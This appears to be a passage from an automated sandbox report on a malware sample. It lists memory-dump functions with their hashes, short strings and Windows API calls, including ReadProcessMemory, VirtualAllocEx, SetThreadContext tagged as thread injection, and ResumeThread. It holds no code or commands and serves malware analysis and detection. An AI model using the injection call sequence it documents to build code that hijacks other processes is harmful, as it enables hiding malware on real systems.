Opcode ID: 7b608e1f733961c0d2998a2e563f68c30611eb01dae0f46b94f6dc0b64f75424
Instruction ID: 07bef9fe935aaade20903128811862601b3ca452f190fbe5546d4259e2599c1e
Opcode Fuzzy Hash: 7b608e1f733961c0d2998a2e563f68c30611eb01dae0f46b94f6dc0b64f75424
Instruction Fuzzy Hash: 162146B59002099FCB10CFA9C9807DEBBF1FF48314F54842AE959A7240D7789945DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02672649, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 026726D0

Strings

;nk, xrefs: 0267266F

Memory Dump Source

Source File: 00000000.00000002.238374144.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID: ;nk
API String ID: 1726664587-1634272568
Opcode ID: 194b4b814463b2a67f8494fd440a627edbedc9b1340b63e73c711e913adbd414
Instruction ID: f50bea178e36759e451c596ac5e343eb228a79a3934eb6e7e9a3c7c2cfdf5b2c
Opcode Fuzzy Hash: 194b4b814463b2a67f8494fd440a627edbedc9b1340b63e73c711e913adbd414
Instruction Fuzzy Hash: 172145B5D042099FCB10CFA9C980BEEBBB5BF48324F51842AE919A7240D7389945DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02672650, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 026726D0

Strings

;nk, xrefs: 0267266F

Memory Dump Source

Source File: 00000000.00000002.238374144.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID: ;nk
API String ID: 1726664587-1634272568
Opcode ID: 610ee28e4d0cff07370f06d004465e531a518a180aeff59740ace56c454e155c
Instruction ID: 1099e254dad9aec8e8aef75d7e1175755ee28514a4c83764091c0f8a35eeefc3
Opcode Fuzzy Hash: 610ee28e4d0cff07370f06d004465e531a518a180aeff59740ace56c454e155c
Instruction Fuzzy Hash: 5E2128B1D042099FCB10CFA9C9807DEBBF5FF48314F51842AE919A7240D7389945DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 026723C8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 02672446

Strings

;nk, xrefs: 026723E4

Memory Dump Source

Source File: 00000000.00000002.238374144.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false

Similarity

API ID: ContextThread
String ID: ;nk
API String ID: 1591575202-1634272568
Opcode ID: dde83b7ffbc21e1989c408ba68364a94243c75a5f2ae788fed504cd62787bcd8
Instruction ID: 9cbb657b38928e767032f456c34c58359e3584b49e4c1c5714ca466a1bc80a52
Opcode Fuzzy Hash: dde83b7ffbc21e1989c408ba68364a94243c75a5f2ae788fed504cd62787bcd8
Instruction Fuzzy Hash: 272138719042088FCB10CFAAC5847EFBBF4AF48328F548429D959A7240DB78A985CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E96DC0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E96E47

Strings

;nk, xrefs: 00E96DDF

Memory Dump Source

Source File: 00000000.00000002.238308590.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID: ;nk
API String ID: 3793708945-1634272568
Opcode ID: d5b4235d67f62c168b2ee7eee5e5ddf4cd5dc7327409e1e9dfb5a49926da4ec1
Instruction ID: 2ecdc060ce6349d527a779ce41ea4783198f4454e29deaf1411ccde4ffdaa95f
Opcode Fuzzy Hash: d5b4235d67f62c168b2ee7eee5e5ddf4cd5dc7327409e1e9dfb5a49926da4ec1
Instruction Fuzzy Hash: 6021C2B5904208DFDB10CFAAD984ADEBBF8FB48324F14841AE955B3310D378A955DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E96DBF, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E96E47

Strings

;nk, xrefs: 00E96DDF

Memory Dump Source

Source File: 00000000.00000002.238308590.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID: ;nk
API String ID: 3793708945-1634272568
Opcode ID: 105c33e97a622ce60c380947f907bf7114b4f1527c1e956b9f4c5b62f85260ac
Instruction ID: 5600b85a3e079053b4496d5a39cfe420e70f03fea9002e8029422b26d517953f
Opcode Fuzzy Hash: 105c33e97a622ce60c380947f907bf7114b4f1527c1e956b9f4c5b62f85260ac
Instruction Fuzzy Hash: F221E2B5900208DFDB10CFAAD584ADEBBF4FB48324F14841AE915B3310C378AA45CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E9AFC0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E9BE89,00000800,00000000,00000000), ref: 00E9C09A

Strings

;nk, xrefs: 00E9C04F

Memory Dump Source

Source File: 00000000.00000002.238308590.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: false

Similarity

API ID: LibraryLoad
String ID: ;nk
API String ID: 1029625771-1634272568
Opcode ID: 6704b49e83795fb3d592b26f7e5dae84625322a6cd86398c38ca9b813591a671
Instruction ID: 156c2254698db5794a46973fc09968c08fa074e97f909194374a33af57c53e70
Opcode Fuzzy Hash: 6704b49e83795fb3d592b26f7e5dae84625322a6cd86398c38ca9b813591a671
Instruction Fuzzy Hash: 061103B6904208CFCB20DFAAC444BDEFBF4AB88364F15842ED915B7200C375A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 026724A0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0267250E

Strings

;nk, xrefs: 026724B7

Memory Dump Source

Source File: 00000000.00000002.238374144.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false

Similarity

API ID: AllocVirtual
String ID: ;nk
API String ID: 4275171209-1634272568
Opcode ID: 7970c5a9bcf841ed3d3591436a29baf431a7fb10403fd3b6b30ee76c547f3f03
Instruction ID: ac79079c525faf6085f862177b0007550134c26376610b282fe5be642aec22d6
Opcode Fuzzy Hash: 7970c5a9bcf841ed3d3591436a29baf431a7fb10403fd3b6b30ee76c547f3f03
Instruction Fuzzy Hash: 171146B19042089FCF10CFAAC954BDFBBF5EF88328F148819E915A7250C775A945DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02672499, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0267250E

Strings

;nk, xrefs: 026724B7

Memory Dump Source

Source File: 00000000.00000002.238374144.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false

Similarity

API ID: AllocVirtual
String ID: ;nk
API String ID: 4275171209-1634272568
Opcode ID: 645923991c144effd08ca4b25d592a9a6be5c257a8066c013f2c5ce94e510fee
Instruction ID: e2d5071da32d1c4014ad6c2684239167daa3b8f0aa7b56115b0f3bc23d238a68
Opcode Fuzzy Hash: 645923991c144effd08ca4b25d592a9a6be5c257a8066c013f2c5ce94e510fee
Instruction Fuzzy Hash: 171179B59042488FCF10CFA9C9447DFBBF5EF48324F14881AD915A7250C7359544DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00E9C02F, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E9BE89,00000800,00000000,00000000), ref: 00E9C09A

Strings

;nk, xrefs: 00E9C04F

Memory Dump Source

Source File: 00000000.00000002.238308590.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: false

Similarity

API ID: LibraryLoad
String ID: ;nk
API String ID: 1029625771-1634272568
Opcode ID: f977f9952fce3b30ea3fd7ab35330122c08a8ee26e8930ab23873f40b02d2841
Instruction ID: f1aab2170a620ab0f958675034b129343f1b9761293d71e4546bd06cc1747271
Opcode Fuzzy Hash: f977f9952fce3b30ea3fd7ab35330122c08a8ee26e8930ab23873f40b02d2841
Instruction Fuzzy Hash: 2A11E4B6904209CFCB10DF9AD544BDEFBF4AB88324F14841ED515B7210C375A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02671CC0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 02671D22

Strings

;nk, xrefs: 02671CD7

Memory Dump Source

Source File: 00000000.00000002.238374144.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false

Similarity

API ID: ResumeThread
String ID: ;nk
API String ID: 947044025-1634272568
Opcode ID: 91331f3433210ecdab4d488412fece998551b9c366f57d80098f5439bd4664c1
Instruction ID: 7f83909ef7d7f4138375c7ea65d5ba914b9d2c18a32cce904a56d193ba2fddcb
Opcode Fuzzy Hash: 91331f3433210ecdab4d488412fece998551b9c366f57d80098f5439bd4664c1
Instruction Fuzzy Hash: 271136B19046488BCB20DFAAD5447DFFBF4AF88328F15881AD519B7240CB79A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02671CB8, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 02671D22

Strings

;nk, xrefs: 02671CD7

Memory Dump Source

Source File: 00000000.00000002.238374144.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false

Similarity

API ID: ResumeThread
String ID: ;nk
API String ID: 947044025-1634272568
Opcode ID: 630b66eb6351f99654be3280b12215e6bf3ee03a69171e14a340a43014839405
Instruction ID: bc049a201e65b9db6e4c83b481374ef381bd0cb3c2f3643d33b4a5f789031fb5
Opcode Fuzzy Hash: 630b66eb6351f99654be3280b12215e6bf3ee03a69171e14a340a43014839405
Instruction Fuzzy Hash: A31155B5D042088BCB20CFA9C5443EEBBF4AF88328F14885AC519B7240D738A945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00E9BDA8, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00E9BE0E

Strings

;nk, xrefs: 00E9BDC7

Memory Dump Source

Source File: 00000000.00000002.238308590.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: false

Similarity

API ID: HandleModule
String ID: ;nk
API String ID: 4139908857-1634272568
Opcode ID: d3f5d98ac18a053299b14a89d502a85ccad1091848b49d90f65498b46ff1c8ec
Instruction ID: 1969edbd7b34ce74426655c979892f861e957ec6988820590e9b01fdf3fae14f
Opcode Fuzzy Hash: d3f5d98ac18a053299b14a89d502a85ccad1091848b49d90f65498b46ff1c8ec
Instruction Fuzzy Hash: D711E0B5D046498FCB20CF9AD544BDEFBF8EB88324F14841AD919B7610C379A946CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E9BDA7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00E9BE0E

Strings

;nk, xrefs: 00E9BDC7

Memory Dump Source

Source File: 00000000.00000002.238308590.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: false

Similarity

API ID: HandleModule
String ID: ;nk
API String ID: 4139908857-1634272568
Opcode ID: 6dde85fff6b05cd91b7d2e61c70cec0dc08786cba33267d3075022d0d16ece7b
Instruction ID: 1b9df5f1c8f7c47c188130aeeaf7d2aabde0d0175454dca763de15459f1655ff
Opcode Fuzzy Hash: 6dde85fff6b05cd91b7d2e61c70cec0dc08786cba33267d3075022d0d16ece7b
Instruction Fuzzy Hash: 6F11E0B5D046498FCB20CF9AD544BDEFBF4EB88324F14841AD929B7610C379A946CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E9DEB9, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 00E9DF1D

Strings

;nk, xrefs: 00E9DEDA

Memory Dump Source

Source File: 00000000.00000002.238308590.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: false

Similarity

API ID: LongWindow
String ID: ;nk
API String ID: 1378638983-1634272568
Opcode ID: 79d7844e403563ce4763f0bfb029d9d5c152a45bafded2c7c0edcefdd8ca18a4
Instruction ID: b2b3f3faf0680ad47b3213941898a67238dc4f4b4057e6856e6f58bc8d8d5196
Opcode Fuzzy Hash: 79d7844e403563ce4763f0bfb029d9d5c152a45bafded2c7c0edcefdd8ca18a4
Instruction Fuzzy Hash: 2D1103B59042099FDB20CF99D985BDFBBF8EB98324F14841AE915B7240C374A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02675728, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 0267578D

Strings

;nk, xrefs: 0267574A

Memory Dump Source

Source File: 00000000.00000002.238374144.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false

Similarity

API ID: MessagePost
String ID: ;nk
API String ID: 410705778-1634272568
Opcode ID: 2bb2b78caf268b7bb077411d695bb31fffadee26a19ba9c35c123a57fa5ca065
Instruction ID: dce58ffb99565e2842a2a5b17f56d2bdcf289a7f6fe7e7f5da09ca86cc82253b
Opcode Fuzzy Hash: 2bb2b78caf268b7bb077411d695bb31fffadee26a19ba9c35c123a57fa5ca065
Instruction Fuzzy Hash: 371103B9900208DFCB20CF99D985BDEBBF8EB58324F14845AD855B3200C378A585CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02675730, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 0267578D

Strings

;nk, xrefs: 0267574A

Memory Dump Source

Source File: 00000000.00000002.238374144.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false

Similarity

API ID: MessagePost
String ID: ;nk
API String ID: 410705778-1634272568
Opcode ID: 1a5d69723f2341cd9354e203b2cf24162ead05b898f549c6291c594a70f3ed1e
Instruction ID: 09ea5971442851c9992d3ad5b46bf920bf23d2375968baed0ecdef623fc5a5f3
Opcode Fuzzy Hash: 1a5d69723f2341cd9354e203b2cf24162ead05b898f549c6291c594a70f3ed1e
Instruction Fuzzy Hash: 101100B58002089FCB20CF99D984BDEBBF8EB48324F10845AE815A3200C374A985CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E9DEC0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 00E9DF1D

Strings

;nk, xrefs: 00E9DEDA

Memory Dump Source

Source File: 00000000.00000002.238308590.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: false

Similarity

API ID: LongWindow
String ID: ;nk
API String ID: 1378638983-1634272568
Opcode ID: 61e377ce4e0f75550a307fc1fdb47d26b102f6fa9488f72ced8cd560d67da485
Instruction ID: 5ac4b002f3ac3f10a7c17dc9fae18292065892a4f53b654f79db8fb5d514e9f7
Opcode Fuzzy Hash: 61e377ce4e0f75550a307fc1fdb47d26b102f6fa9488f72ced8cd560d67da485
Instruction Fuzzy Hash: 1C1112B59042098FDB20CF99D985BDEFBF8EB88324F10841AE915B3300C374A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CCD4D8, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238179622.0000000000CCD000.00000040.00000001.sdmp, Offset: 00CCD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96706785dd6da36aa9727d040af722ab3c7f21f1fdc1eb7f84fe33ea5aad3b74
Instruction ID: 90d735ae3b9de063abeaf52c77cc33d102a6f91deaf59d79798c6f12e82522aa
Opcode Fuzzy Hash: 96706785dd6da36aa9727d040af722ab3c7f21f1fdc1eb7f84fe33ea5aad3b74
Instruction Fuzzy Hash: 5A2122B1604244DFCB05DF10D9C0F26BBA5FB88328F2485BDE90A4B246C336D956DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00CDD01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238199700.0000000000CDD000.00000040.00000001.sdmp, Offset: 00CDD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c3b39a917cde3c73317e23cec9e057d66df703db9dc7638e33da58f50ee0db9
Instruction ID: 6e6fc306a2ecec417ed508d39633cb7ff2e3b51f61e569716704c26b86bb596b
Opcode Fuzzy Hash: 5c3b39a917cde3c73317e23cec9e057d66df703db9dc7638e33da58f50ee0db9
Instruction Fuzzy Hash: 3621C575908244DFDB14DF24D9C4B26BB65FBC4314F24C9AAEA0A4B346C736E847CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00CDD005, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238199700.0000000000CDD000.00000040.00000001.sdmp, Offset: 00CDD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d3075d17da8ea726609f63751c02ac7b2635b0a5a3089bffc58d6a6950aea87
Instruction ID: 9f1a7d292d2477a9e7bc3a5a11f6e875523d4313672fb9c7227912acc2e83fe4
Opcode Fuzzy Hash: 4d3075d17da8ea726609f63751c02ac7b2635b0a5a3089bffc58d6a6950aea87
Instruction Fuzzy Hash: 882180755093C08FCB12CF24D990715BF71EB86314F28C5EBD8498B697C33A980ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 00CCD4D3, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238179622.0000000000CCD000.00000040.00000001.sdmp, Offset: 00CCD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47eed4f306db4c694cde086ab68d208304a7978f4d32bc4ebacdeb989ed2fbcd
Instruction ID: 879aa71d304b74aaf734693d0b2c04c5814a76cae92d1f7ec131b7a533a62e50
Opcode Fuzzy Hash: 47eed4f306db4c694cde086ab68d208304a7978f4d32bc4ebacdeb989ed2fbcd
Instruction Fuzzy Hash: C811D3B6504280DFCB11CF10D9C4B16BF71FB94324F24C6ADD80A0B656C33AD95ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CCD749, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238179622.0000000000CCD000.00000040.00000001.sdmp, Offset: 00CCD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a50af1695ceee9ffd95cef1701d3777c628e147ce9e84dc80a495046c714d88
Instruction ID: 3aa646f80af6f14feacf22420b12b4f925ff346edccdf72d968b87ed6ecdc71d
Opcode Fuzzy Hash: 7a50af1695ceee9ffd95cef1701d3777c628e147ce9e84dc80a495046c714d88
Instruction Fuzzy Hash: 5F01F77110C3449AE7205A22CD80F66FBDCEF45334F18856EE9165B28AC3789984CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00CCD748, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238179622.0000000000CCD000.00000040.00000001.sdmp, Offset: 00CCD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a454ecb9cbbb19ae2d88e8940beb88f79e753ce30ee2ded8d729bf74c3c65c0e
Instruction ID: 0cce3cf50e710205e33584d73209b8c7f4fcad19ba8f1d01aa900615a008af28
Opcode Fuzzy Hash: a454ecb9cbbb19ae2d88e8940beb88f79e753ce30ee2ded8d729bf74c3c65c0e
Instruction Fuzzy Hash: C6F068715043449EE7208E16DC84B62FB98EF55734F18C45AED195B286C3799884CBB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02673A38, Relevance: 2.7, Strings: 2, Instructions: 228COMMON

Download Yara Rule

Strings

]|/, xrefs: 02673C4E
-!DV, xrefs: 02673C01

Memory Dump Source

Source File: 00000000.00000002.238374144.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false

Similarity

API ID:
String ID: -!DV$]|/
API String ID: 0-2911235395
Opcode ID: 167d1eb7e9b3596a6b53692a31855fb228655cdd39a83b638f94e53bc4211223
Instruction ID: e4a2e53e1e6dd4652f2318271624c3592a74fd9f4a720283c5d8c8bd5b63d7a9
Opcode Fuzzy Hash: 167d1eb7e9b3596a6b53692a31855fb228655cdd39a83b638f94e53bc4211223
Instruction Fuzzy Hash: E691E674E05209CF8B08CFAAE5819EEFBB2EB89300F20906AD415AB354D7349952DF95

Uniqueness

Uniqueness Score: -1.00%

Function 02673A28, Relevance: 2.7, Strings: 2, Instructions: 221COMMON

Download Yara Rule

Strings

]|/, xrefs: 02673C4E
-!DV, xrefs: 02673C01

Memory Dump Source

Source File: 00000000.00000002.238374144.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false

Similarity

API ID:
String ID: -!DV$]|/
API String ID: 0-2911235395
Opcode ID: f4ad3499410bc759adb3a4de52d19bcce86f73816457c6c62c0536bfc2eed6ae
Instruction ID: 72525e438546b7429c60d2e5ec99e0a1bf595a861f5a2b076b6820a4c0a02d23
Opcode Fuzzy Hash: f4ad3499410bc759adb3a4de52d19bcce86f73816457c6c62c0536bfc2eed6ae
Instruction Fuzzy Hash: 2691F874E05249CFCB08CFAAE5819EEFBB2EB89300F20906AD415BB354D7349952CF95

Uniqueness

Uniqueness Score: -1.00%

Function 02673E10, Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

[NM2, xrefs: 02673E8F

Memory Dump Source

Source File: 00000000.00000002.238374144.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false

Similarity

API ID:
String ID: [NM2
API String ID: 0-3394017213
Opcode ID: fdf5f7b9d9f44a2c60dde0fe2ad6b0104a5f181ce12dc9ea71e977bad5167290
Instruction ID: 7e2dc00abe2331e5377fbcdfa0c9c38266a03a5119318ddba2e7e21437876768
Opcode Fuzzy Hash: fdf5f7b9d9f44a2c60dde0fe2ad6b0104a5f181ce12dc9ea71e977bad5167290
Instruction Fuzzy Hash: 28512871E04669CBDB28CF66D84479EB7B6BFC9301F40D5EAC50EA7604EB3059968F40

Uniqueness

Uniqueness Score: -1.00%

Function 02673E00, Relevance: 1.4, Strings: 1, Instructions: 143COMMON

Download Yara Rule

Strings

[NM2, xrefs: 02673E8F

Memory Dump Source

Source File: 00000000.00000002.238374144.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false

Similarity

API ID:
String ID: [NM2
API String ID: 0-3394017213
Opcode ID: dd4232f7839c712234d3bb9c042436b44ff8c247e3d374cddb03449b07a14c3a
Instruction ID: 13e46f9e78068339beea1d20a2120298ef503b84f6470b20044938655dd9eac2
Opcode Fuzzy Hash: dd4232f7839c712234d3bb9c042436b44ff8c247e3d374cddb03449b07a14c3a
Instruction Fuzzy Hash: A8512775E006698BDB28CF66D84479AB7B2BFC9300F44D5EAC50EA7604EB305A968F40

Uniqueness

Uniqueness Score: -1.00%

Function 02673FF6, Relevance: 1.4, Strings: 1, Instructions: 119COMMON

Download Yara Rule

Strings

[NM2, xrefs: 02673E8F

Memory Dump Source

Source File: 00000000.00000002.238374144.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false

Similarity

API ID:
String ID: [NM2
API String ID: 0-3394017213
Opcode ID: 601225575a49092e771de097b6d9a75cecc952980af8dd00a062a065f3b4de3e
Instruction ID: 5d6dd15cd833dd3431e9d8497fbe510d2a9b5e5ec52e54426686634722a0e6ed
Opcode Fuzzy Hash: 601225575a49092e771de097b6d9a75cecc952980af8dd00a062a065f3b4de3e
Instruction Fuzzy Hash: 0E5149B4D0066ACBDB24CF65D8447EDB7B2BB99300F5096EAC51EA3200E7705AD68F40

Uniqueness

Uniqueness Score: -1.00%

Function 02673FAA, Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

[NM2, xrefs: 02673E8F

Memory Dump Source

Source File: 00000000.00000002.238374144.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false

Similarity

API ID:
String ID: [NM2
API String ID: 0-3394017213
Opcode ID: bbea0985d67aa5c5d8978b547347fc95b27a0f9ec0c4c85d27c93ac9e883967b
Instruction ID: cc186aa0a5a4f0b79f2852c3b50aaecb99095fa49a862c45dfa589be0cd098c3
Opcode Fuzzy Hash: bbea0985d67aa5c5d8978b547347fc95b27a0f9ec0c4c85d27c93ac9e883967b
Instruction Fuzzy Hash: A7512675D1466ACBDB24CF65D940BEDB7B2BF99300F4096EAC50EB2600E7345AD68F40

Uniqueness

Uniqueness Score: -1.00%

Function 0267405E, Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

[NM2, xrefs: 02673E8F

Memory Dump Source

Source File: 00000000.00000002.238374144.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false

Similarity

API ID:
String ID: [NM2
API String ID: 0-3394017213
Opcode ID: 9fceabf0a55d34e6b48c7a97964edfa757a381a9a06e8bee67aa14adcc71c884
Instruction ID: 42e458da78c2c663db3a85cbc0b9d754f1641262360f96634ca9fee9bd8b0367
Opcode Fuzzy Hash: 9fceabf0a55d34e6b48c7a97964edfa757a381a9a06e8bee67aa14adcc71c884
Instruction Fuzzy Hash: 00412A75E0065ACBDB28CF65D8407DDB7B2BB99301F4096EAC50EA3600E7345AD68F40

Uniqueness

Uniqueness Score: -1.00%

Function 00E9C2B0, Relevance: .5, Instructions: 522COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238308590.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 395deedfab3600c803f758f49afa75163fe9c91b376f8613b2bcc72fd529b2b5
Instruction ID: f12db952fd6b8f5b4a47b5d150a9f04d1e4e44b2b0cf50d4356156a5cef14a5d
Opcode Fuzzy Hash: 395deedfab3600c803f758f49afa75163fe9c91b376f8613b2bcc72fd529b2b5
Instruction Fuzzy Hash: 8C524AB9A80706CFD710CF14E4881997BF1FB65318BD1CA1BD2616BAD0D3B465AACF48

Uniqueness

Uniqueness Score: -1.00%

Function 00E999D8, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238308590.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a8d80182c059b9472d99eeda48b77def31b7fb06b8797dda6252a79e68198c8
Instruction ID: 67b119ac1ed29cda162c7cb922649f61c4f33b43e5b8fd184f2869f6d2550950
Opcode Fuzzy Hash: 7a8d80182c059b9472d99eeda48b77def31b7fb06b8797dda6252a79e68198c8
Instruction Fuzzy Hash: F8A18936E002198FCF05DFA5D9845DEBBF2FF89304B15956AE805BB221EB31AD55CB80

Uniqueness

Uniqueness Score: -1.00%

Function 02673819, Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238374144.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f65201c695a6ba70e6a2cb74b23a4cfc018e33e72d4bd4ea83a0b7f77af9a97
Instruction ID: cd45a48ae7d9335aa2657f6b508127c84e40d3e8f963f550b90b5f74a5b85d59
Opcode Fuzzy Hash: 9f65201c695a6ba70e6a2cb74b23a4cfc018e33e72d4bd4ea83a0b7f77af9a97
Instruction Fuzzy Hash: 7E419A5064C2D19BC3D34B78587A2D2BFF2EE6712870C92CECAD846903E612843FE749

Uniqueness

Uniqueness Score: -1.00%

Function 02670006, Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238374144.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5a550c2c6e124519c01b78cefff067bc80578d0f38aa02c6e4cea461d2a6c53
Instruction ID: 3c3809226f02ee82d41cc133e8ddeed9cfec9a8f8ada7e325b60c856567b4f04
Opcode Fuzzy Hash: a5a550c2c6e124519c01b78cefff067bc80578d0f38aa02c6e4cea461d2a6c53
Instruction Fuzzy Hash: 95314170D093C48FCB0ACF7A985129ABFF2AFC6200F19C0ABC444E7256D6344916CB11

Uniqueness

Uniqueness Score: -1.00%

Function 02670040, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238374144.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c599c15e0502e6acf44e5ee2bc04f529ecc758a5cbb20ba23c9e75cb2acecdf
Instruction ID: 6fd82ee365f8f0c59ad6ae9e742794d01a0b4a24cc898b1b4638d5dbe061e6cd
Opcode Fuzzy Hash: 0c599c15e0502e6acf44e5ee2bc04f529ecc758a5cbb20ba23c9e75cb2acecdf
